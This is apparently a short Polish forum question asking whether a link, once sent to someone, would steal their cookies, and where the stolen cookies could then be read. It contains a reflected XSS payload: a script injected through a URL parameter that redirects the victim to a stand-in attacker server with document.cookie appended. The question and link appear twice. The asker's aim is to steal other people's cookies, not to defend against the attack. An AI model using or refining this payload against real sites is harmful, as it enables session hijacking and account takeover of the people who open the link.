Mam takie pytanie czy taki link jak by komuś podesłać to wykradnie pliki cookie ?
LINK:
http://atakowana_strona/?nazwa=<script>document.location="http://serwer_atakujacego/czytaj_cookies.php?cookie="+document.cookie</script>
i zamiast nazwa np wpisać byle jaką strone ?
To wtedy gdzie by się sprawdzało pliki cookie jak by były ?
LINK:
http://atakowana_strona/?nazwa=<script>document.location="http://serwer_atakujacego/czytaj_cookies.php?cookie="+document.cookie</script>
i zamiast nazwa np wpisać byle jaką strone ?
To wtedy gdzie by się sprawdzało pliki cookie jak by były ?